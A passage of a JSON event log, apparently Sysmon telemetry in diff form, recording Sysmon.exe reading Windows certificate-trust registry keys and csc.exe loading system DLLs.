"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570859020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570859020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570859020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570859020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570859020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570859020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570859020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570859020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\SysWOW64\\kernel32.dll", - "pid": 3592, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\SysWOW64\\kernel32.dll", - "pid": 3592, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570859020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570859180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570859180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570859180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570859180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570859180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570859180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570859180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570859180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570859180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570859180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570859180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570859180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570859180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570859180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570859180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "wow64cpu.dll", - "image_path": "C:\\Windows\\System32\\wow64cpu.dll", - "pid": 3592, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570859180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570859340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570859340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570859340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570859340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570859340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570859340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570859340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570859340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570859340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570859340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570859340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570859340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570859340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570859340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570859340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\SysWOW64\\KernelBase.dll", - "pid": 3592, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570858869984, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570859340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 